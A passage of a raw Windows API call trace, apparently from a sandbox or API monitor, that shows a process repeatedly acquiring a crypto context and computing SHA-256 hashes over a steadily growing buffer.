phProv=0xcdf80*=0x338230d0) returned 1 [0179.512] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.512] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x580, dwFlags=0x0) returned 1 [0179.512] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e910 [0179.512] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.512] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.512] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.513] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.513] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0179.513] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f120 [0179.513] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.513] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.513] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.514] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.514] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0179.514] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f0c0 [0179.514] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.514] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.514] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.514] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.514] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0179.514] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e880 [0179.514] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.514] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.515] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.515] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.515] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x600, dwFlags=0x0) returned 1 [0179.515] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ee50 [0179.515] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.515] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.515] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.516] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.516] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x620, dwFlags=0x0) returned 1 [0179.516] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f0f0 [0179.516] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.516] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.516] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.517] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.517] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x640, dwFlags=0x0) returned 1 [0179.517] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e8e0 [0179.517] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.517] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.517] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.517] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.517] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x660, dwFlags=0x0) returned 1 [0179.517] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e850 [0179.518] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.518] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.518] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.518] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.518] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x680, dwFlags=0x0) returned 1 [0179.518] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ef10 [0179.518] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.518] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.518] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.519] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.519] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0179.519] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f1e0 [0179.519] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.519] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.519] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0179.520] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.520] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0179.520] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ed00 [0179.520] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.520] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0179.520] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.520] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.520] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0179.520] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e8b0 [0179.520] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.520] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.520] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0179.521] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.521] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x700, dwFlags=0x0) returned 1 [0179.521] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6efd0 [0179.521] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.521] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0179.521] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.522] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.522] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x720, dwFlags=0x0) returned 1 [0179.522] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f030 [0179.522] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.522] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.522] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.522] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.522] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x740, dwFlags=0x0) returned 1 [0179.522] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f240 [0179.522] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.522] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.522] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0179.526] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.526] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x760, dwFlags=0x0) returned 1 [0179.526] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ed90 [0179.526] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.526] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0179.526] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821fd0) returned 1 [0179.527] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.527] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x780, dwFlags=0x0) returned 1 [0179.527] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ea30 [0179.527] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.527] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0179.527] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0179.528] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.528] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0179.528] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e940 [0179.528] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.528] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0179.528] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.528] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.528] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0179.528] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ebb0 [0179.529] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.529] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.529] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823ad0) returned 1 [0179.529] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.529] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0179.529] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e970 [0179.529] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.529] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0179.529] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.530] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.530] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x800, dwFlags=0x0) returned 1 [0179.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eca0 [0179.530] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.530] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.530] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ed0) returned 1 [0179.531] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.531] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x820, dwFlags=0x0) returned 1 [0179.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ebe0 [0179.531] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.531] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0179.531] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338231d0) returned 1 [0179.531] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.531] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x840, dwFlags=0x0) returned 1 [0179.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ee80 [0179.531] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.531] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0179.531] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822dd0) returned 1 [0179.532] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.532] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x860, dwFlags=0x0) returned 1 [0179.532] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ec10 [0179.532] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.532] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0179.532] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338235d0) returned 1 [0179.533] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.533] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x880, dwFlags=0x0) returned 1 [0179.533] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ea60 [0179.533] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.533] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0179.533] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338230d0) returned 1 [0179.533] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.533] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0179.534] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f2d0 [0179.534] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.534] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0179.534] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.534] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.534] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0179.534] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e790 [0179.534] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.534] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0179.534] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.535] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.535] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0179.535] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ea90 [0179.535] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.535] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.535] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0179.536] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.536] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x900, dwFlags=0x0) returned 1 [0179.536] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e7c0 [0179.536] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.536] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0179.536] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.536] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.536] CryptHashData (hHash=0x332b7d60, pbData=0x32e64aa0, dwDataLen=0x920, dwFlags=0x0) returned 1 [0179.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eeb0 [0179.537] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0179.537] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.537] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0179.537] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.537] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x940, dwFlags=0x0) returned 1 [0179.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f270 [0179.537] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.537] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0179.537] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0179.538] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.538] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x960, dwFlags=0x0) returned 1 [0179.538] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eaf0 [0179.538] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.538] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0179.538] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0179.539] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.539] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x980, dwFlags=0x0) returned 1 [0179.539] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f2a0 [0179.539] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.539] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0179.539] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0179.540] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.540] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0179.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e9a0 [0179.540] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.540] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0179.540] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0179.541] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.541] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0179.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ecd0 [0179.541] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.541] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0179.541] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0179.542] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.542] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0179.542] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6eac0 [0179.542] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.542] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0179.542] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0179.542] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.542] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0179.542] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f060 [0179.542] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.543] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0179.543] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822bd0) returned 1 [0179.543] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.543] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0179.543] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f300 [0179.543] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.543] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0179.543] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0179.544] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.544] CryptHashData (hHash=0x332b7a50, pbData=0x32e64aa0, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0179.544] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6e820 [0179.544] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0179.544] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0179.544] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0179.544] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0179.544] CryptHashData (hHash=0x332b7a50, 